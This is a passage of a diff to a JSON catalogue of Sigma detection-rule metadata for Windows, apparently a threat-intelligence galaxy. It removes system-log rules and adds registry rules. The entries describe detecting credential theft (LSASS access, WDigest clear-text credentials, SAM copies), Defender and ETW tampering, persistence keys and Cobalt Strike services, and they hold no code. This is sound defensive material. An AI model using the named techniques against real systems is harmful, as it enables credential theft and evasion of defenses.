"http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" ], "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1112" ] }, - "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", - "value": "Service Installation with Suspicious Folder Pattern" + "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "value": "RDP Sensitive Settings Changed to Zero" }, { - "description": "Detects suspicious service installation scripts", - "meta": { - "author": "pH-T", - "creation_date": "2022/03/18", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_service_installation_script.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_script.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ] - }, - "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "value": "Suspicious Service Installation Script" - }, - { - "description": "Windows Update get some error Check if need a 0-days KB", + "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings", "meta": { "author": "frack113", - "creation_date": "2021/12/04", + "creation_date": "2022/01/22", "falsepositive": [ "Unknown" ], - "filename": "win_system_susp_system_update_error.yml", + "filename": "registry_set_ie_persistence.yml", "level": "low", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_system_update_error.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml" ], "tags": [ - "attack.impact", - "attack.resource_development", - "attack.t1584" + "attack.defense_evasion", + "attack.t1112" ] }, - "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", - "value": "Windows Update Error" + "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "value": "Modification of IE Registry Settings" }, { - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", "meta": { - "author": "Cybex", - "creation_date": "2022/08/16", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "52a85084-6989-40c3-8f32-091e12e17692", - "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919" - }, - { - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_system_service_installation_by_unusal_client.yml", - "level": "high", - "logsource.category": "system", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_system_service_installation_by_unusal_client.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ] - }, - "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", - "value": "Service Installed By Unusual Client - System" - }, - { - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "meta": { - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" - ], - "filename": "win_system_tap_driver_installation.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_tap_driver_installation.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ] - }, - "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "value": "Tap Driver Installation" - }, - { - "description": "Detects volume shadow copy mount via windows event log", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "creation_date": "2020/10/20", - "falsepositive": [ - "Legitimate use of volume shadow copy mounts (backups maybe)." - ], - "filename": "win_system_volume_shadow_copy_mount.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_volume_shadow_copy_mount.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "f512acbf-e662-4903-843e-97ce4652b740", - "value": "Volume Shadow Copy Mount" - }, - { - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "meta": { - "author": "NVISO", - "creation_date": "2020/09/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_vul_cve_2020_1472.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2020_1472.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", - "value": "Vulnerable Netlogon Secure Channel Connection Allowed" - }, - { - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "value": "Exploit SamAccountName Spoofing with Kerberos" - }, - { - "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/17", - "falsepositive": [ - "Software installation" - ], - "filename": "win_rare_schtask_creation.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_rare_schtask_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.s0111", - "attack.t1053.005" - ] - }, - "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b", - "value": "Rare Scheduled Task Creations" - }, - { - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/05", - "falsepositive": [ - "Unknown" - ], - "filename": "win_task_scheduler_susp_task_locations.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_task_scheduler_susp_task_locations.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", - "value": "Suspicious Scheduled Tasks Locations" - }, - { - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/29", - "falsepositive": [ - "Unknown" - ], - "filename": "win_terminalservices_rdp_ngrok.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", - "https://ngrok.com/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", - "value": "Ngrok Usage with Remote Desktop Service" - }, - { - "description": "Detects Access to LSASS Process", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/08/26", - "falsepositive": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" - ], - "filename": "win_defender_alert_lsass_access.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_alert_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "value": "LSASS Access Detected via Attack Surface Reduction" - }, - { - "description": "Detects triggering of AMSI by Windows Defender.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2020/09/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "win_defender_amsi_trigger.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_amsi_trigger.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "value": "Windows Defender AMSI Trigger Detected" - }, - { - "description": "Detects disabling Windows Defender threat protection", - "meta": { - "author": "Ján Trenčanský, frack113", - "creation_date": "2020/07/28", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/15", "falsepositive": [ "Administrator actions" ], - "filename": "win_defender_disabled.yml", - "level": "low", - "logsource.category": "No established category", + "filename": "registry_set_enabling_turnoffcheck.yml", + "level": "medium", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml" + "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" ], "tags": [ "attack.defense_evasion", "attack.t1562.001" ] }, - "uuid": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "value": "Windows Defender Threat Detection Disabled" + "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", + "value": "Scripted Diagnostics Turn Off Check Enabled - Registry" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" + ] + }, + "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "value": "Session Manager Autorun Keys Modification" + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "This value is not set by default but could be rarly used by administrators" + ], + "filename": "registry_set_hangs_debugger_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", + "https://persistence-info.github.io/Data/wer_debugger.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", + "value": "Add Debugger Entry To Hangs Key For Persistence" + }, + { + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "meta": { + "author": "Omkar Gudhate", + "creation_date": "2020/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_comhijack_sdclt.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", + "https://www.exploit-db.com/exploits/47696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ] + }, + "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", + "value": "COM Hijack via Sdclt" + }, + { + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_winlogon_notify_key.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "value": "Winlogon Notify Key Logon Persistence" + }, + { + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "meta": { + "author": "frack113", + "creation_date": "2022/01/24", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_blackbyte_ransomware.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "83314318-052a-4c90-a1ad-660ece38d276", + "value": "Blackbyte Ransomware Registry" + }, + { + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "meta": { + "author": "Trent Liffick (@tliffick)", + "creation_date": "2020/05/22", + "falsepositive": [ + "Valid Macros and/or internal documents" + ], + "filename": "registry_set_office_security.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://twitter.com/inversecos/status/1494174785621819397", + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "value": "Office Security Settings Changed" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "meta": { + "author": "Wojciech Lesicki", + "creation_date": "2021/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_cobaltstrike_service_installs.yml", + "level": "critical", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "value": "CobaltStrike Service Installations in Registry" + }, + { + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_chrome_extension.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1133" + ] + }, + "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "value": "Wow6432Node CurrentVersion Autorun Keys Modification" + }, + { + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/12", + "falsepositive": [ + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" + ], + "filename": "registry_set_susp_keyboard_layout_load.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", + "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "value": "Suspicious Keyboard Layout Load" + }, + { + "description": "Detects disabling Windows Defender Tamper Protection", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", + "value": "Disable Tamper Protection on Windows Defender" + }, + { + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/10", + "falsepositive": [ + "Legitimate Addin Installation" + ], + "filename": "registry_set_office_vsto_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://vanmieghem.io/stealth-outlook-persistence/", + "https://twitter.com/_vivami/status/1347925307643355138", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml" + ], + "tags": [ + "attack.t1137.006", + "attack.persistence" + ] + }, + "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "value": "Stealthy VSTO Persistence" + }, + { + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_wdigest_enable_uselogoncredential.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "value": "Wdigest Enable UseLogonCredential" + }, + { + "description": "Detect possible persistence using Fax DLL load when service restart", + "meta": { + "author": "frack113", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_fax_dll_persistance.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://twitter.com/dottor_morte/status/1544652325570191361", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "value": "Change the Fax Dll" + }, + { + "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_services_etw_tamper.yml", + "level": "low", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" + ] + }, + "uuid": "4f281b83-0200-4b34-bf35-d24687ea57c2", + "value": "ETW Logging Disabled For SCM" + }, + { + "description": "Detects disabling Windows Defender PUA protection", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "value": "Disable PUA Protection on Windows Defender" + }, + { + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate SIP being registered by the OS or different software." + ], + "filename": "registry_set_sip_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/codesigning.html", + "https://github.com/gtworek/PSBits/tree/master/SIP", + "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1553.003" + ] + }, + "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "value": "Persistence Via New SIP Provider" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_classes.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "9df5f547-c86a-433e-b533-f2794357e242", + "value": "Classes Autorun Keys Modification" + }, + { + "description": "Detects the manipulation of persistent URLs which could execute malicious code", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_outlook_registry_todaypage.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "value": "Persistent Outlook Landing Today Pages" + }, + { + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_defender_firewall.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", + 